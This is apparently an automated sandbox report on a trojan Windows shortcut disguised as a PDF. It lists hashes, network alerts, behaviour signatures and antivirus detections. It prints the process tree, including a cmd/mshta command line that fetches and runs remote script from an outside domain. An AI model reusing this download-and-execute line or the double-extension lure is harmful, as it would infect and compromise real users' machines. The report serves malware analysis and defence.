Summary | ZeroBOX

Category	Machine	Started	Completed
FILE	s1_win7_x6402	July 1, 2021, 8:51 a.m.	July 1, 2021, 8:53 a.m.

Size	483.0KB
Type	MS Windows shortcut, Item id list present, Points to a file or directory, Has Description string, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Sat Dec 7 00:10:00 2019, mtime=Wed Jun 16 21:15:56 2021, atime=Sat Dec 7 00:10:00 2019, length=13312, window=hide
MD5	`e05468aaa0c436e953116989ccf9703b`
SHA256	`c54cde89abbc781c3c435b2bc2a71189a78f34cd4dfa3a0e804eea407d14c944`
CRC32	`88639C96`
ssdeep	`12288:VSiMFcV6ME5R2X+l8uM/6+9CjoNozoDMftO2:VSpc3E5MXC8uZVMytv`
Yara	anti_vm_detect - Possibly employs anti-virtualization techniques Lnk_Format_Zero - LNK Format

cmd.exe "C:\Windows\System32\cmd.exe" /c start /wait "KXXmjIEjN" "C:\Users\test22\AppData\Local\Temp\United_States_Project_for_Promise.pdf .lnk"
4564
- mshta.exe "C:\Windows\System32\mshta.exe" https://dadsasoa.in/font/js/images/files/United-States_Project_for_Promise/css && wscript.exe
  7724

Name	Response	Post-Analysis Lookup
dadsasoa.in	A 31.220.106.229	31.220.106.229

IP Address	Status	Action
164.124.101.2	Active	Moloch
172.217.25.14	Active	Moloch
31.220.106.229	Active	Moloch

Suricata Alerts

Flow	SID	Signature	Category
TCP 192.168.56.102:49810 -> 31.220.106.229:443	2230002	SURICATA TLS invalid record type	Generic Protocol Command Decode
TCP 192.168.56.102:49810 -> 31.220.106.229:443	2230010	SURICATA TLS invalid record/traffic	Generic Protocol Command Decode
TCP 192.168.56.102:49811 -> 31.220.106.229:443	2230002	SURICATA TLS invalid record type	Generic Protocol Command Decode
TCP 192.168.56.102:49810 -> 31.220.106.229:443	906200056	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.102:49808 -> 31.220.106.229:443	2230002	SURICATA TLS invalid record type	Generic Protocol Command Decode
TCP 192.168.56.102:49811 -> 31.220.106.229:443	2230010	SURICATA TLS invalid record/traffic	Generic Protocol Command Decode
TCP 192.168.56.102:49808 -> 31.220.106.229:443	2230010	SURICATA TLS invalid record/traffic	Generic Protocol Command Decode
TCP 192.168.56.102:49817 -> 31.220.106.229:443	2230002	SURICATA TLS invalid record type	Generic Protocol Command Decode
TCP 192.168.56.102:49808 -> 31.220.106.229:443	906200056	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.102:49817 -> 31.220.106.229:443	2230010	SURICATA TLS invalid record/traffic	Generic Protocol Command Decode
TCP 31.220.106.229:443 -> 192.168.56.102:49808	2230002	SURICATA TLS invalid record type	Generic Protocol Command Decode
TCP 31.220.106.229:443 -> 192.168.56.102:49817	2230002	SURICATA TLS invalid record type	Generic Protocol Command Decode
TCP 31.220.106.229:443 -> 192.168.56.102:49811	2230002	SURICATA TLS invalid record type	Generic Protocol Command Decode
TCP 31.220.106.229:443 -> 192.168.56.102:49817	2230010	SURICATA TLS invalid record/traffic	Generic Protocol Command Decode
TCP 31.220.106.229:443 -> 192.168.56.102:49808	2230010	SURICATA TLS invalid record/traffic	Generic Protocol Command Decode
TCP 31.220.106.229:443 -> 192.168.56.102:49811	2230010	SURICATA TLS invalid record/traffic	Generic Protocol Command Decode
TCP 192.168.56.102:49829 -> 31.220.106.229:443	2230002	SURICATA TLS invalid record type	Generic Protocol Command Decode
TCP 192.168.56.102:49829 -> 31.220.106.229:443	2230010	SURICATA TLS invalid record/traffic	Generic Protocol Command Decode
TCP 192.168.56.102:49824 -> 31.220.106.229:443	2230002	SURICATA TLS invalid record type	Generic Protocol Command Decode
TCP 192.168.56.102:49813 -> 31.220.106.229:443	2230002	SURICATA TLS invalid record type	Generic Protocol Command Decode
TCP 192.168.56.102:49824 -> 31.220.106.229:443	2230010	SURICATA TLS invalid record/traffic	Generic Protocol Command Decode
TCP 192.168.56.102:49813 -> 31.220.106.229:443	2230010	SURICATA TLS invalid record/traffic	Generic Protocol Command Decode
TCP 192.168.56.102:49824 -> 31.220.106.229:443	906200056	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.102:49813 -> 31.220.106.229:443	906200056	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 31.220.106.229:443 -> 192.168.56.102:49829	2230002	SURICATA TLS invalid record type	Generic Protocol Command Decode
TCP 31.220.106.229:443 -> 192.168.56.102:49829	2230010	SURICATA TLS invalid record/traffic	Generic Protocol Command Decode
TCP 31.220.106.229:443 -> 192.168.56.102:49813	2230002	SURICATA TLS invalid record type	Generic Protocol Command Decode
TCP 31.220.106.229:443 -> 192.168.56.102:49824	2230002	SURICATA TLS invalid record type	Generic Protocol Command Decode
TCP 31.220.106.229:443 -> 192.168.56.102:49813	2230010	SURICATA TLS invalid record/traffic	Generic Protocol Command Decode
TCP 31.220.106.229:443 -> 192.168.56.102:49824	2230010	SURICATA TLS invalid record/traffic	Generic Protocol Command Decode
TCP 31.220.106.229:443 -> 192.168.56.102:49810	2230002	SURICATA TLS invalid record type	Generic Protocol Command Decode
TCP 31.220.106.229:443 -> 192.168.56.102:49810	2230010	SURICATA TLS invalid record/traffic	Generic Protocol Command Decode
TCP 192.168.56.102:49819 -> 31.220.106.229:443	2230002	SURICATA TLS invalid record type	Generic Protocol Command Decode
TCP 192.168.56.102:49827 -> 31.220.106.229:443	2230002	SURICATA TLS invalid record type	Generic Protocol Command Decode
TCP 192.168.56.102:49819 -> 31.220.106.229:443	2230010	SURICATA TLS invalid record/traffic	Generic Protocol Command Decode
TCP 192.168.56.102:49827 -> 31.220.106.229:443	2230010	SURICATA TLS invalid record/traffic	Generic Protocol Command Decode
TCP 192.168.56.102:49819 -> 31.220.106.229:443	906200056	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.102:49827 -> 31.220.106.229:443	906200056	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.102:49814 -> 31.220.106.229:443	2230002	SURICATA TLS invalid record type	Generic Protocol Command Decode
TCP 31.220.106.229:443 -> 192.168.56.102:49819	2230002	SURICATA TLS invalid record type	Generic Protocol Command Decode
TCP 31.220.106.229:443 -> 192.168.56.102:49827	2230002	SURICATA TLS invalid record type	Generic Protocol Command Decode
TCP 31.220.106.229:443 -> 192.168.56.102:49819	2230010	SURICATA TLS invalid record/traffic	Generic Protocol Command Decode
TCP 192.168.56.102:49814 -> 31.220.106.229:443	2230010	SURICATA TLS invalid record/traffic	Generic Protocol Command Decode
TCP 31.220.106.229:443 -> 192.168.56.102:49827	2230010	SURICATA TLS invalid record/traffic	Generic Protocol Command Decode
TCP 192.168.56.102:49814 -> 31.220.106.229:443	906200056	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.102:49821 -> 31.220.106.229:443	2230002	SURICATA TLS invalid record type	Generic Protocol Command Decode
TCP 31.220.106.229:443 -> 192.168.56.102:49814	2230002	SURICATA TLS invalid record type	Generic Protocol Command Decode
TCP 192.168.56.102:49821 -> 31.220.106.229:443	2230010	SURICATA TLS invalid record/traffic	Generic Protocol Command Decode
TCP 31.220.106.229:443 -> 192.168.56.102:49814	2230010	SURICATA TLS invalid record/traffic	Generic Protocol Command Decode
TCP 31.220.106.229:443 -> 192.168.56.102:49821	2230002	SURICATA TLS invalid record type	Generic Protocol Command Decode
TCP 31.220.106.229:443 -> 192.168.56.102:49821	2230010	SURICATA TLS invalid record/traffic	Generic Protocol Command Decode
TCP 192.168.56.102:49825 -> 31.220.106.229:443	2230002	SURICATA TLS invalid record type	Generic Protocol Command Decode
TCP 192.168.56.102:49825 -> 31.220.106.229:443	2230010	SURICATA TLS invalid record/traffic	Generic Protocol Command Decode
TCP 192.168.56.102:49828 -> 31.220.106.229:443	2230002	SURICATA TLS invalid record type	Generic Protocol Command Decode
TCP 31.220.106.229:443 -> 192.168.56.102:49825	2230002	SURICATA TLS invalid record type	Generic Protocol Command Decode
TCP 192.168.56.102:49828 -> 31.220.106.229:443	2230010	SURICATA TLS invalid record/traffic	Generic Protocol Command Decode
TCP 31.220.106.229:443 -> 192.168.56.102:49825	2230010	SURICATA TLS invalid record/traffic	Generic Protocol Command Decode
TCP 192.168.56.102:49828 -> 31.220.106.229:443	906200056	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 31.220.106.229:443 -> 192.168.56.102:49828	2230002	SURICATA TLS invalid record type	Generic Protocol Command Decode
TCP 31.220.106.229:443 -> 192.168.56.102:49828	2230010	SURICATA TLS invalid record/traffic	Generic Protocol Command Decode
TCP 192.168.56.102:49820 -> 31.220.106.229:443	2230002	SURICATA TLS invalid record type	Generic Protocol Command Decode
TCP 192.168.56.102:49820 -> 31.220.106.229:443	2230010	SURICATA TLS invalid record/traffic	Generic Protocol Command Decode
TCP 192.168.56.102:49820 -> 31.220.106.229:443	906200056	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 31.220.106.229:443 -> 192.168.56.102:49820	2230002	SURICATA TLS invalid record type	Generic Protocol Command Decode
TCP 31.220.106.229:443 -> 192.168.56.102:49820	2230010	SURICATA TLS invalid record/traffic	Generic Protocol Command Decode
TCP 192.168.56.102:49823 -> 31.220.106.229:443	2230002	SURICATA TLS invalid record type	Generic Protocol Command Decode
TCP 192.168.56.102:49823 -> 31.220.106.229:443	2230010	SURICATA TLS invalid record/traffic	Generic Protocol Command Decode
TCP 192.168.56.102:49823 -> 31.220.106.229:443	906200056	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 31.220.106.229:443 -> 192.168.56.102:49823	2230002	SURICATA TLS invalid record type	Generic Protocol Command Decode
TCP 31.220.106.229:443 -> 192.168.56.102:49823	2230010	SURICATA TLS invalid record/traffic	Generic Protocol Command Decode

Suricata TLS

No Suricata TLS

Checks amount of memory in system, this can be used to detect virtual machines that have a low amount of memory available (1 event)

Time & API	Arguments	Status	Return	Repeated
GlobalMemoryStatusEx July 1, 2021, 8:51 a.m.		1	1	0

Allocates read-write-execute memory (usually to unpack itself) (1 event)

Time & API	Arguments	Status	Return	Repeated
NtProtectVirtualMemory July 1, 2021, 8:51 a.m.	process_identifier: 7724 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x73772000 process_handle: 0xffffffff	1	0	0

Creates a shortcut to an executable file (1 event)

file	C:\Users\test22\AppData\Local\Temp\United_States_Project_for_Promise.pdf .lnk

Creates a suspicious process (1 event)

cmdline

"C:\Windows\System32\mshta.exe" https://dadsasoa.in/font/js/images/files/United-States_Project_for_Promise/css && wscript.exe

Changes read-write memory protection to read-execute (probably to avoid detection when setting all RWX flags at the same time) (1 event)

Time & API	Arguments	Status	Return	Repeated
NtProtectVirtualMemory July 1, 2021, 8:51 a.m.	process_identifier: 7724 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 length: 4096 protection: 32 (PAGE_EXECUTE_READ) base_address: 0x7ef80000 process_handle: 0xffffffff	1	0	0

Yara rule detected in process memory (8 events)

description	(no description)	rule	DebuggerCheck__GlobalFlags
description	(no description)	rule	DebuggerCheck__QueryInfo
description	(no description)	rule	DebuggerHiding__Thread
description	(no description)	rule	DebuggerHiding__Active
description	(no description)	rule	ThreadControl__Context
description	(no description)	rule	SEH__vectored
description	Checks if being debugged	rule	anti_dbg
description	Bypass DEP	rule	disable_dep

Communicates with host for which no DNS query was performed (1 event)

host

172.217.25.14

Disables proxy possibly for traffic interception (1 event)

Time & API	Arguments	Status	Return	Repeated
RegSetValueExA July 1, 2021, 8:51 a.m.	key_handle: 0x000002dc regkey_r: ProxyEnable reg_type: 4 (REG_DWORD) value: 0 regkey: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ProxyEnable	1	0	0

Resumed a suspended thread in a remote process potentially indicative of process injection (2 events)

Time & API	Arguments	Status	Return	Repeated
Process injection	Process 4564 resumed a thread in remote process 7724
NtResumeThread July 1, 2021, 8:51 a.m.	thread_handle: 0x00000334 suspend_count: 1 process_identifier: 7724	1	0	0

File has been identified by 22 AntiVirus engines on VirusTotal as malicious (22 events)

Arcabit	Heur.BZC.YAX.Nioc.1.07376574
Cyren	LNK/Trojan.TXNC-4
TrendMicro-HouseCall	TROJ_FRS.VSNTFL21
Kaspersky	HEUR:Trojan.WinLNK.Agent.gen
BitDefender	Heur.BZC.YAX.Nioc.1.07376574
ViRobot	LNK.S.Downloader.494560
MicroWorld-eScan	Heur.BZC.YAX.Nioc.1.07376574
Rising	Downloader.Mshta/LNK!1.BADA (CLASSIC)
Ad-Aware	Heur.BZC.YAX.Nioc.1.07376574
Sophos	Troj/DownLnk-BD
TrendMicro	TROJ_FRS.VSNTFL21
FireEye	Heur.BZC.YAX.Nioc.1.07376574
Emsisoft	Heur.BZC.YAX.Nioc.1.07376574 (B)
Ikarus	BZC.YAX.Nioc
Microsoft	Trojan:Script/Wacatac.B!ml
AegisLab	Trojan.WinLNK.Nioc.4!c
ZoneAlarm	HEUR:Trojan.WinLNK.Agent.gen
GData	Heur.BZC.YAX.Nioc.1.07376574
ALYac	Trojan.Agent.LNK.Gen
MAX	malware (ai score=82)
VBA32	Trojan.Link.Crafted
Zoner	Probably Heur.LNKScript

United_States_Project_for_Promise.pdf .lnk

Process Tree Toggle all

Network Toggle all

Suricata Toggle all

Suricata Alerts

Suricata TLS

Signatures Toggle All